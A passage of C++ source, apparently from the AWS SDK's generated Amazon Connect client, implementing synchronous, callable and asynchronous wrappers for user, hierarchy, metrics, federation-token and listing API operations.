void ConnectClient::DeleteUserAsync(const DeleteUserRequest& request, const DeleteUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DeleteUserAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DeleteUserAsyncHelper(const DeleteUserRequest& request, const DeleteUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DeleteUser(request), context);
}
DescribeUserOutcome ConnectClient::DescribeUser(const DescribeUserRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUser", "Required field: UserId, is not set");
return DescribeUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUser", "Required field: InstanceId, is not set");
return DescribeUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DescribeUserOutcome(DescribeUserResult(outcome.GetResult()));
}
else
{
return DescribeUserOutcome(outcome.GetError());
}
}
DescribeUserOutcomeCallable ConnectClient::DescribeUserCallable(const DescribeUserRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DescribeUserOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DescribeUser(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DescribeUserAsync(const DescribeUserRequest& request, const DescribeUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DescribeUserAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DescribeUserAsyncHelper(const DescribeUserRequest& request, const DescribeUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DescribeUser(request), context);
}
DescribeUserHierarchyGroupOutcome ConnectClient::DescribeUserHierarchyGroup(const DescribeUserHierarchyGroupRequest& request) const
{
if (!request.HierarchyGroupIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUserHierarchyGroup", "Required field: HierarchyGroupId, is not set");
return DescribeUserHierarchyGroupOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [HierarchyGroupId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUserHierarchyGroup", "Required field: InstanceId, is not set");
return DescribeUserHierarchyGroupOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user-hierarchy-groups/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetHierarchyGroupId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DescribeUserHierarchyGroupOutcome(DescribeUserHierarchyGroupResult(outcome.GetResult()));
}
else
{
return DescribeUserHierarchyGroupOutcome(outcome.GetError());
}
}
DescribeUserHierarchyGroupOutcomeCallable ConnectClient::DescribeUserHierarchyGroupCallable(const DescribeUserHierarchyGroupRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DescribeUserHierarchyGroupOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DescribeUserHierarchyGroup(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DescribeUserHierarchyGroupAsync(const DescribeUserHierarchyGroupRequest& request, const DescribeUserHierarchyGroupResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DescribeUserHierarchyGroupAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DescribeUserHierarchyGroupAsyncHelper(const DescribeUserHierarchyGroupRequest& request, const DescribeUserHierarchyGroupResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DescribeUserHierarchyGroup(request), context);
}
DescribeUserHierarchyStructureOutcome ConnectClient::DescribeUserHierarchyStructure(const DescribeUserHierarchyStructureRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUserHierarchyStructure", "Required field: InstanceId, is not set");
return DescribeUserHierarchyStructureOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user-hierarchy-structure/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DescribeUserHierarchyStructureOutcome(DescribeUserHierarchyStructureResult(outcome.GetResult()));
}
else
{
return DescribeUserHierarchyStructureOutcome(outcome.GetError());
}
}
DescribeUserHierarchyStructureOutcomeCallable ConnectClient::DescribeUserHierarchyStructureCallable(const DescribeUserHierarchyStructureRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DescribeUserHierarchyStructureOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DescribeUserHierarchyStructure(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DescribeUserHierarchyStructureAsync(const DescribeUserHierarchyStructureRequest& request, const DescribeUserHierarchyStructureResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DescribeUserHierarchyStructureAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DescribeUserHierarchyStructureAsyncHelper(const DescribeUserHierarchyStructureRequest& request, const DescribeUserHierarchyStructureResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DescribeUserHierarchyStructure(request), context);
}
GetContactAttributesOutcome ConnectClient::GetContactAttributes(const GetContactAttributesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetContactAttributes", "Required field: InstanceId, is not set");
return GetContactAttributesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
if (!request.InitialContactIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetContactAttributes", "Required field: InitialContactId, is not set");
return GetContactAttributesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InitialContactId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/attributes/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetInitialContactId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetContactAttributesOutcome(GetContactAttributesResult(outcome.GetResult()));
}
else
{
return GetContactAttributesOutcome(outcome.GetError());
}
}
GetContactAttributesOutcomeCallable ConnectClient::GetContactAttributesCallable(const GetContactAttributesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetContactAttributesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetContactAttributes(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetContactAttributesAsync(const GetContactAttributesRequest& request, const GetContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetContactAttributesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetContactAttributesAsyncHelper(const GetContactAttributesRequest& request, const GetContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetContactAttributes(request), context);
}
GetCurrentMetricDataOutcome ConnectClient::GetCurrentMetricData(const GetCurrentMetricDataRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetCurrentMetricData", "Required field: InstanceId, is not set");
return GetCurrentMetricDataOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/metrics/current/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetCurrentMetricDataOutcome(GetCurrentMetricDataResult(outcome.GetResult()));
}
else
{
return GetCurrentMetricDataOutcome(outcome.GetError());
}
}
GetCurrentMetricDataOutcomeCallable ConnectClient::GetCurrentMetricDataCallable(const GetCurrentMetricDataRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetCurrentMetricDataOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetCurrentMetricData(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetCurrentMetricDataAsync(const GetCurrentMetricDataRequest& request, const GetCurrentMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetCurrentMetricDataAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetCurrentMetricDataAsyncHelper(const GetCurrentMetricDataRequest& request, const GetCurrentMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetCurrentMetricData(request), context);
}
GetFederationTokenOutcome ConnectClient::GetFederationToken(const GetFederationTokenRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetFederationToken", "Required field: InstanceId, is not set");
return GetFederationTokenOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user/federate/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetFederationTokenOutcome(GetFederationTokenResult(outcome.GetResult()));
}
else
{
return GetFederationTokenOutcome(outcome.GetError());
}
}
GetFederationTokenOutcomeCallable ConnectClient::GetFederationTokenCallable(const GetFederationTokenRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetFederationTokenOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetFederationToken(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetFederationTokenAsync(const GetFederationTokenRequest& request, const GetFederationTokenResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetFederationTokenAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetFederationTokenAsyncHelper(const GetFederationTokenRequest& request, const GetFederationTokenResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetFederationToken(request), context);
}
GetMetricDataOutcome ConnectClient::GetMetricData(const GetMetricDataRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetMetricData", "Required field: InstanceId, is not set");
return GetMetricDataOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/metrics/historical/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetMetricDataOutcome(GetMetricDataResult(outcome.GetResult()));
}
else
{
return GetMetricDataOutcome(outcome.GetError());
}
}
GetMetricDataOutcomeCallable ConnectClient::GetMetricDataCallable(const GetMetricDataRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetMetricDataOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetMetricData(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetMetricDataAsync(const GetMetricDataRequest& request, const GetMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetMetricDataAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetMetricDataAsyncHelper(const GetMetricDataRequest& request, const GetMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetMetricData(request), context);
}
ListContactFlowsOutcome ConnectClient::ListContactFlows(const ListContactFlowsRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListContactFlows", "Required field: InstanceId, is not set");
return ListContactFlowsOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact-flows-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListContactFlowsOutcome(ListContactFlowsResult(outcome.GetResult()));
}
else
{
return ListContactFlowsOutcome(outcome.GetError());
}
}
ListContactFlowsOutcomeCallable ConnectClient::ListContactFlowsCallable(const ListContactFlowsRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListContactFlowsOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListContactFlows(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListContactFlowsAsync(const ListContactFlowsRequest& request, const ListContactFlowsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListContactFlowsAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListContactFlowsAsyncHelper(const ListContactFlowsRequest& request, const ListContactFlowsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListContactFlows(request), context);
}
ListHoursOfOperationsOutcome ConnectClient::ListHoursOfOperations(const ListHoursOfOperationsRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListHoursOfOperations", "Required field: InstanceId, is not set");
return ListHoursOfOperationsOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/hours-of-operations-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListHoursOfOperationsOutcome(ListHoursOfOperationsResult(outcome.GetResult()));
}
else
{
return ListHoursOfOperationsOutcome(outcome.GetError());
}
}
ListHoursOfOperationsOutcomeCallable ConnectClient::ListHoursOfOperationsCallable(const ListHoursOfOperationsRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListHoursOfOperationsOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListHoursOfOperations(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListHoursOfOperationsAsync(const ListHoursOfOperationsRequest& request, const ListHoursOfOperationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListHoursOfOperationsAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListHoursOfOperationsAsyncHelper(const ListHoursOfOperationsRequest& request, const ListHoursOfOperationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListHoursOfOperations(request), context);
}
ListPhoneNumbersOutcome ConnectClient::ListPhoneNumbers(const ListPhoneNumbersRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListPhoneNumbers", "Required field: InstanceId, is not set");
return ListPhoneNumbersOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/phone-numbers-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListPhoneNumbersOutcome(ListPhoneNumbersResult(outcome.GetResult()));
}
else
{
return ListPhoneNumbersOutcome(outcome.GetError());
}
}
ListPhoneNumbersOutcomeCallable ConnectClient::ListPhoneNumbersCallable(const ListPhoneNumbersRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListPhoneNumbersOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListPhoneNumbers(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListPhoneNumbersAsync(const ListPhoneNumbersRequest& request, const ListPhoneNumbersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListPhoneNumbersAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListPhoneNumbersAsyncHelper(const ListPhoneNumbersRequest& request, const ListPhoneNumbersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListPhoneNumbers(request), context);
}
ListQueuesOutcome ConnectClient::ListQueues(const ListQueuesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListQueues", "Required field: InstanceId, is not set");
return ListQueuesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/queues-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListQueuesOutcome(ListQueuesResult(outcome.GetResult()));
}
else
{
return ListQueuesOutcome(outcome.GetError());
}
}
ListQueuesOutcomeCallable ConnectClient::ListQueuesCallable(const ListQueuesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListQueuesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListQueues(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListQueuesAsync(const ListQueuesRequest& request, const ListQueuesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListQueuesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListQueuesAsyncHelper(const ListQueuesRequest& request, const ListQueuesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListQueues(request), context);
}
ListRoutingProfilesOutcome ConnectClient::ListRoutingProfiles(const ListRoutingProfilesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListRoutingProfiles", "Required field: InstanceId, is not set");
return ListRoutingProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/routing-profiles-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListRoutingProfilesOutcome(ListRoutingProfilesResult(outcome.GetResult()));
}
else
{
return ListRoutingProfilesOutcome(outcome.GetError());
}
}
ListRoutingProfilesOutcomeCallable ConnectClient::ListRoutingProfilesCallable(const ListRoutingProfilesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListRoutingProfilesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListRoutingProfiles(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListRoutingProfilesAsync(const ListRoutingProfilesRequest& request, const ListRoutingProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListRoutingProfilesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListRoutingProfilesAsyncHelper(const ListRoutingProfilesRequest& request, const ListRoutingProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListRoutingProfiles(request), context);
}
ListSecurityProfilesOutcome ConnectClient::ListSecurityProfiles(const ListSecurityProfilesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListSecurityProfiles", "Required field: InstanceId, is not set");
return ListSecurityProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/security-profiles-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListSecurityProfilesOutcome(ListSecurityProfilesResult(outcome.GetResult()));
}
else
{
return ListSecurityProfilesOutcome(outcome.GetError());
}
}
ListSecurityProfilesOutcomeCallable ConnectClient::ListSecurityProfilesCallable(const ListSecurityProfilesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListSecurityProfilesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListSecurityProfiles(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListSecurityProfilesAsync(const ListSecurityProfilesRequest& request, const ListSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListSecurityProfilesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListSecurityProfilesAsyncHelper(const ListSecurityProfilesRequest& request, const ListSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListSecurityProfiles(request), context);
}
ListTagsForResourceOutcome ConnectClient::ListTagsForResource(const ListTagsForResourceRequest& request) const
{
if (!request.ResourceArnHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListTagsForResource", "Required field: ResourceArn, is not set");
return ListTagsForResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [ResourceArn]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/tags/";
ss << request.GetResourceArn();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListTagsForResourceOutcome(ListTagsForResourceResult(outcome.GetResult()));
}
else
{
return ListTagsForResourceOutcome(outcome.GetError());
}
}
ListTagsForResourceOutcomeCallable ConnectClient::ListTagsForResourceCallable(const ListTagsForResourceRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListTagsForResourceOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListTagsForResource(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListTagsForResourceAsync(const ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListTagsForResourceAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListTagsForResourceAsyncHelper(const ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListTagsForResource(request), context);
}
ListUserHierarchyGroupsOutcome ConnectClient::ListUserHierarchyGroups(const ListUserHierarchyGroupsRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListUserHierarchyGroups", "Required field: InstanceId, is not set");
return ListUserHierarchyGroupsOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user-hierarchy-groups-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListUserHierarchyGroupsOutcome(ListUserHierarchyGroupsResult(outcome.GetResult()));
}
else
{
return ListUserHierarchyGroupsOutcome(outcome.GetError());
}
}
ListUserHierarchyGroupsOutcomeCallable ConnectClient::ListUserHierarchyGroupsCallable(const ListUserHierarchyGroupsRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListUserHierarchyGroupsOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListUserHierarchyGroups(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListUserHierarchyGroupsAsync(const ListUserHierarchyGroupsRequest& request, const ListUserHierarchyGroupsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListUserHierarchyGroupsAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListUserHierarchyGroupsAsyncHelper(const ListUserHierarchyGroupsRequest& request, const ListUserHierarchyGroupsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListUserHierarchyGroups(request), context);
}
ListUsersOutcome ConnectClient::ListUsers(const ListUsersRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListUsers", "Required field: InstanceId, is not set");
return ListUsersOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListUsersOutcome(ListUsersResult(outcome.GetResult()));
}
else
{
return ListUsersOutcome(outcome.GetError());
}
}
ListUsersOutcomeCallable ConnectClient::ListUsersCallable(const ListUsersRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListUsersOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListUsers(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
